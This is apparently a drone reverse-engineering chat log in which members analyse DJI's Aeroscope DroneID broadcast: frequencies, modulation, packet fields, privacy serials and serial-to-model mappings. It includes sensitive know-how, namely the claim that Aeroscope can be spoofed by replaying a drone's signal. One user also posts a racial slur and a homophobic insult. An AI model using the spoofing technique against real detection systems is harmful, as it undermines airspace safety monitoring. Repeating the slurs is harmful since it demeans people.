The FAA is not just an oversight agency but an actual law enforcement agency. When you request to operate in restricted airspace, through DJI's app, you are then essentially requesting for your information to be run through all their risk assessment tools and passed off to whatever arm of the FAA or other law enforcement agency they see fit to assist. My guess is this happens a lot, especially to people who are flagged a higher "risk", could be age, criminal record, where you are requesting to fly, religious affiliation.... or anything else. I'm sure post 9/11 those systems are deep and local cops are the quickest way to get eyes on someone.
[2021-04-08 16:09:09]
pingspike :
this was in the UK
[2021-04-08 16:10:35]
cloudwerx :
I would think same would apply, only difference is they may not have guns :grin:
[2021-04-08 17:14:31]
atlantic :
message says: emailed atc for approval. maybe the police got the info from ATC and not from DJI.
[2021-04-08 17:15:57]
atlantic :
and the story does not say whether Birmingham has an Aeroscope.
[2021-04-08 17:26:24]
validat0r :
they damn sure dont have a periscope
[2021-04-08 17:36:25]
quad808 :
I think this is the first time anyone has reported this, but I find it unlikely that DJI notifies law enforcement. They can get all that info from Aeroscope, with access to DJI's user database, track where you're flying from via GPS from the app, sent back to DJI and BAM! They show up. Easy test of this would be....apply for an unlock at an airport. Get approval from local authorities AND DJI unlock. Never turn on your drone. See if anyone shows up. Let the unlock expire, then apply for another one. Same location. This time fly the drone. Aeroscope would pick it up, if they have one in operation, and if that is the case, they may come calling. That's my .02 anyway...
[2021-04-09 04:09:12]
cloudwerx :
Yeah I think once the request is passed off it's then in the hands of whatever agency actually gives approval and then gets run through their systems. I know this was not in the USA but [https://www.faa.gov/uas/programs_partnerships/data_exchange/](https://www.faa.gov/uas/programs_partnerships/data_exchange/) is what makes these requests so easy here in the States
[2021-04-09 04:55:26]
cloudwerx :
Aeroscope is only useful if you are in range of an OcuSync device to detect it, but with newer devices there is likely going to be some much more robust monitoring shit.
[2021-04-09 05:00:50]
cloudwerx :
Btw: I can't seem to find it, but I recently found an article that someone wrote who found some new code in either DJI GO or a newer DJI drone's FW that mentions "guns", "rifles" or something like that, basically going to enable law enforcement to disable drones remotely and also make it harder to flee the scene if you try. We know DJI is releasing an app soon that detects drones so.. me no likey the big brother stuff. I would pay to disable this shit and I don't even do anything illegal.
[2021-04-12 14:22:49]
pingspike :
just revisiting this...
[2021-04-12 14:23:20]
pingspike :
can all AeroScope users see / have access to a list of active DJI GEO unlocks? :thinking_face:
[2021-04-12 15:33:34]
steventisseyre :
No, they cannot
[2021-04-12 15:41:22]
cloudwerx :
I would think only within their airspace, but, remoteID will be different. Law enforcement (even forest service) will be able to see everything. DJI is releasing a smart phone app that will basically act like an Aeroscope as well, they have already found code in new DJI devices that mention guns/weapons. That is going to be used for police to be able to drop your drone/freeze it and track anyone fleeing
[2021-04-12 15:41:23]
pingspike :
based on the screen shot above, how did the police know that someone had requested an unlock in that area? :thinking_face:
[2021-04-12 15:42:06]
cloudwerx :
Because the FAA or whatever agency operates there sent them
[2021-04-12 15:43:02]
cloudwerx :
Shit is about to get weird
[2021-04-12 15:45:57]
cloudwerx :
That's why people are working on exploiting Aeroscope; with all the new tools coming out it will provide more attack surfaces, hopefully someone smarter than me can figure this out. In the USA, flying drones as a hobby is going to be ending soon
[2021-04-12 16:08:47]
pingspike :
interesting
[2021-04-12 16:09:26]
pingspike :
so you think the CAA here in the UK are notified by DJI every time someone unlocks a geozone?
[2021-04-12 16:19:00]
cloudwerx :
DJI does not do anything but pass off the request to the gov agency who actually approves the requests
[2021-04-12 16:20:50]
cloudwerx :
[https://www.faa.gov/uas/programs_partnerships/data_exchange/](https://www.faa.gov/uas/programs_partnerships/data_exchange/) this is the system the FAA uses to fast track requests, so Dji just passes off the request and waits for an approval or denial. Other countries likely have similar systems buy DJI has no influence at all over the requests
[2021-04-12 16:21:18]
cloudwerx :
but* sorry typing with my feet
[2021-04-12 18:00:09]
dkovar :
Wait. There are NFZ approvals, which are handled by DJI, and LAANC approvals, which are handled by various service providers.
The post was about NFZ unlocks. That would not be handled by the FAA, CAA, etc.
[2021-04-12 19:31:17]
pingspike :
strange…
[2021-04-12 19:31:39]
pingspike :
maybe that facebook post was just bullshit :man-shrugging::skin-tone-2:
[2021-04-12 19:31:56]
pingspike :
I came across the FB screen shot on twitter
[2021-04-12 19:32:01]
validat0r :
bullshit on fb? heaven, no
[2021-04-12 19:32:04]
pingspike :
I’m not on FB so can’t look it up
[2021-04-12 19:32:17]
pingspike :
seems a strange thing to make up
[2021-04-12 19:33:25]
pingspike :
maybe the cops just got the details from ATC when he requested permission to fly there
[2021-04-12 19:33:35]
pingspike :
and not from aeroscope at all
[2021-04-12 19:51:40]
dkovar :
I don't think it was made up, I think some details were a bit fuzzy.
What I suspect happened is:
1. The operator unlocked the NFZ
2. The operator contacted ATC to let them know he was flying. He probably told ATC "I've already unlocked the NFZ"
3. An Aeroscope unit detected the flight.
4. LE called ATC and asked "Do you know about this?"
5. ATC said "Yes, he contacted us, he also unlocked the NFZ"
6. LE contacted the operator. They have his serial number from AS and the fact that he unlocked the NFZ from ATC, verbally.
[2021-04-12 20:02:35]
pingspike :
thanks @dkovar - makes perfect sense
[2021-04-12 20:03:17]
pingspike :
I think my concern/fear was that every time someone unlocks a DJI GEO zone, that DJI are then sharing that information with various third parties (law enforcement, CAA/FAA, etc)
[2021-04-12 20:13:35]
dkovar :
DJI has a vested interest in not automatically sending information to LE, if they could even figure out what agency to send it to.
And, LE generally wants to ask for information, or get it through something official, like Remote ID.
DJI will respond to a warrant, but they're not automatically sharing information.
It -is- very valuable information, that is certain.
[2021-04-12 20:15:20]
pingspike :
what ever happened to this?
[2021-04-12 20:15:22]
pingspike :
<https://www.dji.com/newsroom/news/dji-demonstrates-direct-drone-to-phone-remote-identification>
[2021-04-12 20:15:29]
pingspike :
November 2019 :man-shrugging::skin-tone-2:
[2021-04-12 20:15:54]
pingspike :
Remote ID for Joe Public, right?
[2021-04-12 20:16:22]
pingspike :
all gone quiet since then
[2021-04-12 20:16:29]
pingspike :
(thankfully)
[2021-04-12 20:36:17]
dkovar :
Once the U.S. Government figures out Remote ID then DJI can quickly support it. They did the demo in an effort to get their version considered as an official solution.
[2021-04-13 06:51:26]
eitan1195 :
do the mavic mini / mavic mini 2 run android?
[2021-04-13 21:46:20]
chipmangini :
@eitan1195 I would ask in a more appropriate forum, like ~spoon-feeding
[2021-04-16 16:53:30]
pingspike :
did DJIs drone id smartphone app ever become anything more than a press release?
the app that anyone can download to ID any drone and operator
[2021-04-16 16:53:43]
pingspike :
anyone ever see a working demo of it?
[2021-04-16 17:49:47]
atlantic :
Not me. But I guess for their wi-fi based drones, you should be able to pick up the beacons if you put your wi-fi interface into monitoring mode.
[2021-04-20 10:14:52]
jcase :
@eitan1195 I would not consider it android no, it does use some android bits
[2021-04-20 10:30:32]
djibot.5150 :
Would it be possible to make an Xposed-like framework since it uses android bits?
[2021-04-20 10:31:45]
djibot.5150 :
To run on the drone*
[2021-04-20 11:32:46]
mefisto :
You can create any framework, on any device. The question is - what problem do you want to solve?
Xposed provided a unified interface to more device functions, fixing the issue of multiple stand-alone mods wanting to hook into specific places, and those places being different between platforms.
Where are the stand-alone mods for Mini which conflict each other and have compatibility issues?
Also, how is any of that related to droneid?
[2021-04-20 11:38:39]
validat0r :
valid questions.
[2021-04-20 11:47:13]
djibot.5150 :
It was, sorry. Not sure I can write why here.
[2021-04-20 13:24:27]
mefisto :
Your keyboard does ninja dodges when you try?
We don't have any hard frames for moderation. We don't discuss crimes, but that's pretty much it in regard to rules.
[2021-04-20 15:19:38]
djibot.5150 :
I wasn't aware it was a crime
[2021-04-20 15:20:53]
djibot.5150 :
Since when is a Mac change a crime? Since when is using a VPN a crime?
[2021-04-20 15:27:29]
djibot.5150 :
Anyway I'm out, your whole dji secretive shit is pretty gay. Why are you hiding from dji? This was supposed to be a place to learn but "not in public" doesn't help anyone. Anyway I'm a nigger with a keyboard, not a ninja dodging anything. You all are the ones dodging. You all are so much help I tried to upload firmware for DDD and binary turns it into a huge word game, I'm pretty much denied learning how to upload a bin for you all so fuck it... Bye
[2021-04-20 16:33:32]
validat0r :
Word
[2021-04-20 17:01:07]
bin4ry :
@djibot.5150 I didn't turn anything into a word game. You said you thought using Assistant turns on adb on the drone, which isn't the case. I honestly didn't understand what you were after at all; also I told you that Assistant uses restore points of Windows and that the firmware downloading mechanism can be reversed. I don't understand where you are going here, we do not hand out all years of work on a silver plate. Ask proper questions and get proper answers.
And what should I understand from a question like "I want to upload to DDD, is it a hidden Assistant setting"? I told you I don't understand the question. Then you asked if that enables adb mode, I told you it doesn't. I really don't get what you are blaming me for here?! What of that is a word game of me? I gave you a proper answer about what you need to do to achieve firmware downloading, so where is the problem here?
Same now again, @mefisto tells you to spit it out and tell what you are trying to do, and you bail out? You were the one telling that you don't want to speak about it in public, big lol man.
[2021-04-21 19:42:05]
fredmicrowave :
I have been monitoring M2P comms, first with the remote off so I could watch the drone trying to handshake, then connected, so I could see control packets jumping all around, and OcuSync, which I had previously limited to 10 MHz bandwidth (9 MHz actually), on one frequency.
I could get data from packets, but my knowledge stops at the RF part.
If there is something interesting or useful to do, I can try...
[2021-04-21 20:13:39]
atlantic :
it is an OFDM signal, based on the LTE PHY. There is no generic tool to demodulate it, as far as I know.
[2021-04-21 20:21:27]
fredmicrowave :
I thought each packet could contain at least some useful information (like ID), but I have no idea really. Tnx.
[2021-04-21 21:39:49]
nopexecutor :
There are several layers in there. At the end it conveys several channels, for video data, duml packets, flight log. Drone ID frame has a different structure than the usual downlink, it also usually happens on different frequency
[2021-04-22 12:40:10]
rachfly :
It seems that the Aeroscope signal is transmitted in some other frequency bands in the M2P and M1P.
Do you know how it is implemented in the Phantom 4 / Pro? Do the GPS and drone ID come from the Lightbridge transmission or are there other freqs/bursts that contain the relevant Aeroscope data?
[2021-04-22 13:55:59]
nopexecutor :
I know how it works in P4P v2, no idea how it works in P4P...
[2021-04-25 06:56:13]
rachfly :
How does it work in the P4Pv2? I guess it's OcuSync, so probably like the MP1?
[2021-04-25 10:20:10]
nopexecutor :
Yup, it's based on Ocusync there. Only slightly different compared to e.g. MA2 (one OFDM symbol less, but it doesn't make any real difference to the decoded content...)
[2021-04-25 11:12:15]
rachfly :
Thank you :slightly_smiling_face:
Isn't it weird that there isn't any information about the Lightbridge protocol and the implementation of the droneID? Am I missing something on the web or here? LB has been out there for a long time by now.. one would think that the information about it would be public (in the rev community) after so long
[2021-04-25 17:08:25]
atlantic :
Well, reverse engineering is a nice hobby. In my experience, people that have reversed it (for instance drone ID) are willing to give some small hints to other people that are also trying to reverse it. But they do not give away a complete solution for everyone to use without putting any effort in it themselves. That is just not fun.
[2021-04-25 17:16:59]
atlantic :
A good starting point is reading the FCC documentation. Record the entire spectrum the document describes. There will be a downlink signal, an uplink signal and a drone ID signal. Try to locate the drone ID in the spectrum plot / waterfall. Lightbridge is based on WiMAX. Be careful when you share your signal recordings with other people, as your GPS location may be in the recording.
[2021-04-26 05:02:05]
mingtao :
Aeroscope inside-edition
[2021-04-26 05:10:41]
tmbinc :
\o/
Is this any off-the-shelf SBC board that I don't recognize? It looks very custom and hand-built.
[2021-04-26 06:12:06]
atlantic :
interesting. The magic is under the heatsinks I suppose. I wonder if it has the same chips as in the aircraft/controller or they have something like an Analog Devices AD9364.
[2021-04-26 06:25:24]
atlantic :
But if you remove the heatsinks, all chips are shielded from RF with a metal housing, so you still will not see anything.
[2021-04-26 08:54:12]
rachfly :
Thank you for the answer. So ofc for OcuSync it is clear, the separation for downlink vs uplink vs Aeroscope is clear (definitely different freq bands). For LB it is less clear, or am I missing something?
Thanks
[2021-04-26 17:13:00]
atlantic :
Does somebody have a clue what the "SyncLeas transmission" of Hubsan is based on?
[2021-04-26 17:25:55]
atlantic :
or is it just a fancy marketing name for 802.11a with an Atheros chip
[2021-04-26 19:21:10]
atlantic :
I do not have a Lightbridge drone. If you send a recording of a Lightbridge drone I can have a look if there is a similar mechanism.
[2021-04-27 00:20:40]
fredmicrowave :
Military drone controller ? :smile:
[2021-04-27 04:53:52]
reza.qodsi1362 :
@atlantic the best solution is the FCC ID when you have such a question. It seems to be just an ordinary Wi-Fi Atheros chipset:
<https://fccid.io/2AN75-ZINO2-1RX/Internal-Photos/Internal-Photos-4653995.pdf>
[2021-04-27 07:30:53]
atlantic :
thanks @reza.qodsi1362. Their Zino 1 is advertised with wifi, the Zino 2 with this SyncLeas. When you look at this FCC doc it seems to be just wifi indeed.
[2021-04-27 07:32:05]
atlantic :
It must be some mass produced chip, either wifi or lte, at their price point.
[2021-05-14 05:21:31]
hazardc :
They can see this stuff with a basic sdr setup you can probably put together for less than 100 bucks but the PD probably paid 100k for it
[2021-05-14 06:24:23]
atlantic :
What does a mobile Aeroscope cost? I thought something like $8000 or so.
[2021-05-14 13:30:16]
dkovar :
You can see the packets with a basic SDR setup but decoding them requires a bit more effort. An Aeroscope unit runs about $30K, depending on antennas, service agreements, and such. Mobile is less. I don't have a price sheet handy. Definitely far less than $100K.
[2021-05-18 06:08:52]
reza.qodsi1362 :
It seems spoofing Aeroscope is very easy! Just replay the drone downlink signal! Aeroscope will beep and the serial number will appear!! No defense mechanism has been made!
[2021-05-18 18:28:37]
atlantic :
there is no timestamp field or something like that in the drone id signal, so indeed an Aeroscope cannot tell the difference between live, replay, or spoofed.
[2021-05-18 18:46:33]
dkovar :
A stock AS may not be able to. Post flight analysis would likely reveal the spoofed traffic.
[2021-05-18 22:15:23]
fredmicrowave :
I think that the time and date on the AC is set according to the phone's. So by setting the date and time you want on your phone, you could fake timestamps.
[2021-05-19 17:19:08]
atlantic :
there are no time stamps in the drone id signal
[2021-05-20 12:53:29]
kb :
Does anyone have a list of the mapping between the model number in the droneid packet to the model name?
[2021-05-20 13:45:06]
mutantroar :
That would be nice. The first couple characters of the serial number are a good start. Here is what I've got so far for that:
08=Mavic Pro
07=P4
OA=Spark
0K=Air
16=Mavic 2 Pro
0M=Mavic2 Zoom
1S=Mini
[2021-05-20 13:45:49]
nopexecutor :
Nice to see more people able to decode it :) I've seen model 0x3A in MA2, 0x3F in MM2, 0x10 in Mavic Pro (or 2? Not sure), 0x24 in P4Pv2
[2021-05-20 13:48:26]
nopexecutor :
BTW. I've found recently some other signal with 640ms periodicity, embedded in main OcuSync2 DL (same freq, sharing bursts with normal traffic), which fails to decode for me using "usual method"... Anybody seen that?
[2021-05-20 14:08:15]
bin4ry :
That is what I use in dronehacks as a fallback to determine the drone from the SN prefix:
```python
def device_from_snprefix(snprefix):
    # Map a DJI serial-number prefix to a model name.
    # These are substring checks, so the more specific prefix
    # ("3NZ") has to be tested before the shorter one ("3N").
    if "08R" in snprefix:
        return "Mavic Pro"
    if "0B" in snprefix:
        return "Spark"
    if "0A" in snprefix:
        return "Spark"
    if "1SC" in snprefix:
        return "Mavic Mini CE"
    if "1SD" in snprefix:
        return "Mavic Mini FCC"
    if "3NZ" in snprefix:
        return "Mini 2"
    if "0M" in snprefix:
        return "Mavic 2 Series"
    if "16" in snprefix:
        return "Mavic 2 Series"
    if "29" in snprefix:
        return "Mavic 2 Enterprise Series"
    if "0K" in snprefix:
        return "Mavic Air"
    if "3N" in snprefix:
        return "Mavic Air 2"
    if "1W" in snprefix:
        return "Mavic Air 2"
    if "07" in snprefix:
        return "Phantom 4 Series"
    if "11" in snprefix:
        return "Phantom 4 Pro v2.0"
    if "09" in snprefix:
        return "Inspire 2"
    if "37Q" in snprefix:
        return "DJI FPV Racer"
    return None  # unknown prefix
```
[2021-05-20 14:08:19]
bin4ry :
maybe it helps
[2021-05-20 17:00:56]
atlantic :
you can also see the difference between Mavic Pro and the Platinum, it has a P instead of a 0 somewhere in the middle.
[2021-05-21 08:18:29]
atlantic :
3Y Mavic Air 2S
[2021-06-03 22:35:57]
nopexecutor :
Uh, false alarm :P I found a way to decode those frames, just a small variation from the normal one, nothing interesting.
[2021-06-08 05:54:30]
eitan1195 :
In Lightbridge (Phantom 4 Pro for instance), how are the Aeroscope packets (containing the serial of the FC) passed? The FC module is encrypted and can't be reversed.
[2021-06-09 06:27:52]
tomer.cyber.punk :
How did you get the FC module FW?
[2021-06-09 08:53:12]
tomer.cyber.punk :
Does someone know the location of the code which is responsible for sending DroneID packets?
[2021-06-09 11:34:32]
atlantic :
[2021-06-09 11:35:32]
atlantic :
This document gives some information on the drone id in the wi-fi based drones from DJI.
[2021-06-09 12:04:20]
tomer.cyber.punk :
@atlantic, I read this paper already but I'm not interested in the WiFi communication but in the long range communication (WiMAX, LTE based?)
[2021-06-09 12:06:21]
tomer.cyber.punk :
In addition, it looks like in the WiFi based drones like the Mavic Pro the binary "dji_network" (which implements the drone ID WiFi functionality) is not executed at all
[2021-06-09 13:19:10]
tomer.cyber.punk :
@takeshi87 Do you know at what freq DroneId packets are transmitted?
[2021-06-09 13:44:58]
atlantic :
There are several frequencies, but not the same frequency as the downlink.
[2021-06-09 14:02:26]
atlantic :
When I put my Mavic Pro in wi-fi mode, it does not seem to transmit drone id. It does transmit something in the wi-fi Beacon frame, but it has no useful data.
[2021-06-10 06:47:31]
tomer.cyber.punk :
@atlantic Can you please tell the freqs? you can PM me
[2021-06-10 10:44:08]
tomer.cyber.punk :
@atlantic you are right, in wifi mode, no drone id is transmitted.
[2021-06-10 13:06:20]
mutantroar :
In wifi mode, the Mavic Pro sends the two packets that are supposed to contain the droneID data. It sends the identifying bytes for the packet, but the data itself is filled with 0x00.
[2021-06-10 15:21:11]
atlantic :
I have not discovered a system in the frequency, they are just "random" in the frequency band
[2021-06-10 15:27:47]
atlantic :
indeed
[2021-06-10 15:29:00]
atlantic :
I just record the entire band (in steps, my SDR can't record the entire band at once) and look for it with an offline spectrum plot. It is hard to find a drone id in a live waterfall.
[2021-06-10 19:12:36]
nopexecutor :
From what I observed - it is typically centered on 2414.5MHz, 2429.5MHz, 2444.5MHz or 2459.5MHz, at least in OcuSync 2
[2021-06-13 12:00:30]
saeedsasa941 :
@takeshi87 Interesting, Thanks! and what modulation it uses? Is it possible to demodulate the Drone ID? as the Aeroscope does?
[2021-06-13 12:03:13]
nopexecutor :
On physical layer - OFDM + QPSK in channels, in general quite similar to LTE 10MHz. It is possible - but I haven't heard of any publicly available tool for that
[2021-06-13 12:11:40]
saeedsasa941 :
@takeshi87 Great thanks! Do you know if the packet is encrypted? Or is the drone ID packet transmitted in plain text?
[2021-06-13 12:24:01]
nopexecutor :
Not encrypted, but there is scrambling and error correction in place
[2021-06-14 15:13:11]
cloudwerx :
[https://youtu.be/4LSD9PTN6Zg](https://youtu.be/4LSD9PTN6Zg) sorry if this has already been posted
[2021-06-18 20:30:09]
lapse98 :
Thanks! Having issue identifying goggles vs FPV drone.
[2021-07-14 12:34:29]
dkovar :
I suck at RF.
If I had an SDR available and I wanted simply to detect, not decode drone IDs:
1. What frequencies would I monitor? (2.4GHz/5.8GHz)
2. What would I look for?
Again, no need to decode it, I just want to know that there is a drone ID being broadcast.
[2021-07-14 13:46:55]
nopexecutor :
Which drone? Probably easiest to detect in OcuSync, where it often happens outside of the main signal BW, and is 10MHz wide compared to usual 20MHz normal DL. I typically saw it on 2.4GHz, but wouldn't bet on it...
[2021-07-14 14:18:22]
dkovar :
This is for a POC by a SDR engineer looking for an interesting project. So any current DJI model is good enough.
[2021-07-14 14:21:47]
tmbinc :
Just take the envelope and find packets with the right length then
[2021-07-14 14:22:05]
tmbinc :
To make this more interesting try to correlate with the reference symbol.
[2021-10-26 20:38:25]
tmbinc_ :
tmbinc_ joined the channel.
[2021-10-28 18:10:37]
pixel :
pixel joined the channel.
[2021-10-28 22:28:51]
doctor :
doctor joined the channel.
[2021-10-29 06:00:56]
vortex :
atlantic joined the channel.
[2021-10-29 07:22:22]
zkar :
zkar joined the channel.
[2021-10-29 16:58:06]
dronedavid :
dronedavid joined the channel.
[2021-10-30 04:06:17]
crushedice2000 :
crushedice2000 joined the channel.
[2021-10-30 08:04:20]
antoine :
antoine joined the channel.
[2021-10-30 12:16:13]
jj :
madmaqx joined the channel.
[2021-10-31 00:11:41]
will :
will joined the channel.
[2021-10-31 09:53:42]
czokie :
czokie joined the channel.
[2021-10-31 10:20:52]
cs2000 :
cs2000 joined the channel.
[2021-10-31 20:00:36]
skyninja :
skyninja joined the channel.
[2021-10-31 20:08:11]
skyninja :
does anybody know what chips are inside the Aeroscope to receive OcuSync and Lightbridge? I have seen photos, but they all have the metal RF shielding over the chips, so you can't see what chips they use. For wi-fi they probably use the Qualcomm Atheros chips. But what do they do for OcuSync and Lightbridge? The Mavic Pro has a Leadcore 1860 LTE SoC. If I remember correctly they used some Analog Devices RF transceiver + FPGA for early versions of Lightbridge, but switched to a Chinese ASIC for later versions. So is it a real software defined radio, say Xilinx FPGA in combination with an Analog Devices RF transceiver? Does somebody have the Aeroscope firmware? Does that give a clue, for instance does it contain FPGA images?
[2021-10-31 21:11:30]
jcase :
@skyninja more or less its got RCs in it
[2021-10-31 21:42:23]
cs2000 :
@cs2000 left the channel.
[2021-11-02 07:21:36]
fly2high213 :
fly2high213 joined the channel.
[2021-11-03 21:45:20]
whydji :
whydji joined the channel.
[2021-11-05 10:11:59]
atlantic :
Anyone already have RF recording / IQ samples of a DJI Mavic 3?
[2021-11-05 10:56:24]
tmbinc :
No, but it's P1 again, so I don't expect many changes
[2021-11-05 15:24:18]
dave0x6d :
dave0x6d joined the channel.
[2021-11-08 15:12:49]
j4ck :
j4ck joined the channel.
[2021-11-09 11:32:14]
dkovar :
I'm seeing Drone IDs of the form NewDrone_xx. Is this what is actually transmitted, or is this the AS unit not recognizing the drone type?
[2021-11-09 15:03:39]
atlantic :
do you have a screenshot of that?
[2021-11-09 15:13:01]
atlantic :
The Drone ID is transmitted by the drone, and I assume an Aeroscope will display it as is, it is up to 16 characters.
[2021-11-09 15:53:50]
nopexecutor :
Hmm... at least the "drone type" in droneId packet was just 1 byte - I would assume AS has problems interpreting some new values
[2021-11-09 16:36:04]
atlantic :
btw I meant the "Drone ID" field and not the Drone ID packet (-:
[2021-11-09 19:10:04]
the_lord :
AS is not recognizing the drone type, whenever new drone released you'll see this
[2021-11-09 19:10:27]
the_lord :
most probably its M3
[2021-11-10 08:58:53]
jezzab :
If it's NewDrone_68 (pretty sure they use decimal otherwise it's NewDrone_44) it's a Mavic 3 @dkovar
[2021-11-10 09:03:03]
jezzab :
The serial is up to 16 chars, the rest of the data is much more than that. The model ID field used by later versions is a single byte
[2021-11-10 10:19:15]
dkovar :
I have _61, _68, _69, _70 all in the last few months.
[2021-11-10 10:20:03]
dkovar :
And "unknown"s show up over the years as well. And a bunch of "???????????"
[2021-11-10 10:25:18]
the_lord :
most probably AS is not getting the full SN or received a corrupted packet, so it is showing unknown
[2021-11-10 10:32:00]
jezzab :
It's because the software is out of date (or maybe there isn't a newer version). Those are
```
61 FPV
68 M3
69 M2 Enterprise Advanced
70 Mavic Mini SE
```
[2021-11-10 10:38:44]
dkovar :
Thank you very much.
[2021-11-10 16:49:46]
aszeszo :
aszeszo joined the channel.
[2021-11-11 15:07:39]
skyninja :
In the Aeroscope, I am seeing fakefake12345678 in the droneID field (the "serial number"). The number after fakefake varies. The observed drone types are mostly MavicPro, sometimes P4P, P4 or unknow (yes, the n is missing). Any ideas where that fakefake is coming from? I assume there is some form of error detection like a CRC in a drone id packet, so it will not be a receive error. Also, why do I not see it with other drone types? MavicPro, P4P, P4 are all OcuSync 1 drones, and the rest is OcuSync 2 and beyond? Does the number after fakefake mean anything?
[2021-11-11 15:08:54]
atlantic :
The drone id packets have a CRC24 at the end.
[2021-11-11 15:12:20]
the_lord :
fakefakeXXXXXXX means there is a problem in the drone FW itself, not the AeroScope; you also notice the drone location is incorrect, beyond the detection range of AeroScope itself
[2021-11-11 21:49:06]
jcase :
fakefake just means the privacy flags are set
[2021-11-11 22:05:16]
tmbinc :
The number after "fakefake" is a hash of the serial number, I think
[2021-11-11 22:06:07]
tmbinc :
and right, it depends on "user_priv" flag
[2021-11-11 22:06:19]
tmbinc :
if that's set, it uses this fakefake thing, otherwise the real serial
[2021-11-11 23:21:49]
jcase :
If I recall it used to be just a random number, but I'm not sure
[2021-11-11 23:21:54]
jcase :
It's been years since I've looked
[2021-11-11 23:22:14]
jcase :
I could (and probably am) be wrong
[2021-11-12 10:31:50]
cs2000 :
cs2000 joined the channel.
[2021-11-12 10:31:59]
cs2000 :
@cs2000 left the channel.
[2021-11-12 10:32:05]
cs2000 :
cs2000 joined the channel.
[2021-11-12 10:32:34]
cs2000 :
@dji-rev-bot
[2021-11-12 10:32:42]
cs2000 :
@cs2000 left the channel.
[2021-11-12 10:33:12]
cs2000 :
cs2000 joined the channel.
[2021-11-12 10:33:18]
cs2000 :
dji-rev-bot added to the channel by cs2000.
[2021-11-12 10:33:22]
cs2000 :
@cs2000 left the channel.
[2021-11-12 13:24:35]
the_lord :
I saw many cases of drones with stock FW broadcasting fakefakeXXXXX due to a bug in FW not setting the privacy flag properly
[2021-11-14 20:36:27]
jezzab :
^^ this. There is a buffer overflow in the older FC firmware where it sends a random number after the fakefake
[2021-11-15 05:44:52]
dave0x6d :
0-click remote infoleak?
[2021-11-16 14:51:16]
alex1234 :
alex1234 joined the channel.
[2021-11-21 18:42:18]
dkovar :
Looking at 6 months of AS data.
21,525 total flights
5,066 flights with no pilot location data
1,078 of those flights had more than 10 points in them.
The drone types were all over the range.
96 of those flights had no home location. The drone types were P3, Mavic Mini, Mavic Mini 2, and Mavic 2.
1) Pilot location comes from mobile device, correct? And it gets that information from the onboard location service and the app sends it to the UAV?
2) What legitimate reasons are there for no location data to be available?
3) Would putting the mobile device in airplane mode produce this effect and would it otherwise limit the functionality of the drone?
4) How much of this might be illegitimate?
5) Where does the home location data come from? The UAV itself?
[2021-11-21 19:30:23]
tmbinc :
is "home location" different from "app location"?
[2021-11-21 19:30:47]
tmbinc :
For mini2 (and I assume the others in the same way), app sends app location, time etc. to UAV, then UAV puts it into the droneid packet
[2021-11-21 19:31:46]
tmbinc :
btw how much of those flights is a.) wifi, b.) lightbridge, c.) ocusync?
[2021-11-21 19:32:23]
tmbinc :
ah, is home location RTH location? I need to double check if that's included in the droneid packet (others maybe know?)
[2021-11-21 21:58:55]
atlantic :
home location is different than app location.
[2021-11-21 22:00:57]
atlantic :
does a DJI controller have a u-blox GNSS chip inside, or does it get the app location from the phone that runs the app?
[2021-11-21 22:02:11]
atlantic :
3. if I put my phone in airplane mode, I still have GPS.
[2021-11-21 22:05:12]
atlantic :
1. I assume that the app sends its GPS location on the uplink and the UAV sends this location together with other info on the drone id signal.
[2021-11-21 22:26:46]
dkovar :
Those flights are a mix of all of the options.
Home location is RTH and is included in the packet.
App location is Pilot location and that comes from the mobile device running the app.
[2021-11-22 07:28:52]
atlantic :
Do you have a mobile Aeroscope, or a Stationary Unit?
[2021-11-22 07:31:48]
atlantic :
"more than 10 points in them", you mean you received more than 10 packets with a location?
[2021-11-22 09:21:50]
tmbinc :
btw, the behavior of phones in airplane mode wrt. GPS has changed over the years, so I wouldn't rule out that there are still some that switch off GPS. (iOS only changed this in iOS 8 or so, for example). Also, GPS without correction data may take a loooong time to get sync so I would not be surprised if some people with airplane mode on will not have a valid app position.
[2021-11-22 10:27:13]
cooker :
cooker joined the channel.
[2021-11-22 11:46:47]
kilrah :
and a bunch of people use dedicated tablets without cellular (and thus GPS) for their drones
[2021-11-23 00:07:14]
dkovar :
This is coming from a variety of sources.
"More than ten points" - yes, more than ten individual records for the same UAV. There are a lot of "short tracks" - tracks with only a few points.
A dedicated tablet without cellular seems to be the most likely source of the missing data.
[2021-11-23 16:57:36]
atlantic :
This uuid in the droneid packet [ref Anatomy-of-DJI-Drone-ID-Implementation1.pdf page 12], is there a way to relate that to a DJI account? You have to make an account on dji.com to use their drones, I assume that will generate a uuid that is transmitted in the droneid packet. Is there a way (API on their website or something) to get user info related to that uuid?
[2021-11-23 17:01:26]
atlantic :
Apparently if you fly with another app than a DJI app, the uuid is filled with something else.
[2021-11-23 17:24:47]
jcase :
yes it links to the account, but you need to work with dji to get the account information from that uuid
[2021-11-24 14:59:06]
dnacho :
pabloiarriola joined the channel.
[2021-11-24 23:05:42]
kimberlyisaflake :
kimberlyisaflake joined the channel.
[2021-11-28 00:18:42]
tissy :
tissy joined the channel.
[2021-11-28 23:30:37]
tissy :
Does anyone happen to know how the pitch, roll & yaw angle on a DroneID packet is encoded please.
[2021-11-30 07:04:47]
czokie :
Your best idea is to look at the dissectors on the og github https://github.com/o-gs/dji-firmware-tools
[2021-11-30 10:35:54]
atlantic :
@tissy see Anatomy-of-DJI-Drone-ID-Implementation1.pdf page 12. I have not verified it myself.
[2021-11-30 10:37:00]
atlantic :
[2021-11-30 21:04:31]
dkovar :
OK. P4 UAV flew four flights in close proximity in time and space. Data is collected by a single sensor. On the first flight, the Drone Type appears as "P4", next flight "P4 Series", then "P4", then "P4 Series" again. Normally I'd think firmware on the sensor, but it was the same sensor.
[2021-12-04 22:57:38]
aol :
aol joined the channel.
[2021-12-07 15:26:50]
enigma2 :
enigma2 joined the channel.
[2021-12-08 08:29:06]
galbb12 :
galbb12 joined the channel.
[2021-12-09 14:32:56]
staydji :
staydji joined the channel.
[2021-12-10 08:21:21]
il1oo0 :
il1oo0 joined the channel.
[2021-12-14 15:33:53]
msp3241 :
msp3241 joined the channel.
[2021-12-14 16:27:22]
feckless :
feckless joined the channel.
[2021-12-20 18:06:30]
alex1122 :
alex1122 joined the channel.
[2022-01-02 18:52:57]
djshadowxm81 :
djshadowxm81 joined the channel.
[2022-01-03 17:51:35]
droneuser :
biosblob joined the channel.
[2022-01-08 21:57:38]
lurker :
lurker joined the channel.
[2022-01-13 13:11:10]
lapse98 :
Anyone know the ID numbers for a Mavic 3? Seeing a lot of “unknown” flights starting with 4AEC
[2022-01-13 14:48:47]
atlantic :
Mavic 3 seems to start with F45 and F4Q.
[2022-01-13 14:52:36]
atlantic :
